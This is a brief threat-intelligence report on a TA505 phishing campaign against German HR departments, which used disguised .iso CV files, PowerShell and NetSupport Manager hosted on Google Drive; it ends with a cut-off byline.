TA505: A new attack, believed to be attributed to the threat group TA505, is targeting Human Resource departments within organizations located in Germany. Using Business Email Compromise (BEC) style of phishing attacks, the group is utilizing trojanized disk image files (using file extension “.iso”) disguised as curriculum vitae files. Once the .iso files are open, an embedded Microsoft shortcut (.lnk) file will run a PowerShell script to deploy tools including NetSupport Manager remote control administrator for intelligence gathering and data theft. The group is also using Google Drive for hosting their attack tools and has previously used the GPG encryption tool as a ransomware capability. The research was released from Prevailion and according to them, the attacks have been ongoing since April of 2018. TA505 has used PowerShell scripts to steal login credentials from browsers and steal credit card information. In the first waves of the attack, the group used GPG to encrypt the victim’s files and hold them for ransom. When the group started the second wave of attacks, they used NetSupport Manager to steal information such as screen captures, voice recordings, and files. NetSupport was delivered via a Google Drive account operated by the attackers. Google Drive and other trusted cloud service providers have been used by multiple threat groups recently to host malware files in order to avoid detection by network-based defense systems. Researchers attributed this attack to TA505 through a digital signature associated with the loader used in the German attacks.
By Akshay Rohatgi and Randy Pargman About this Student Research Project Binary Defense’s mission is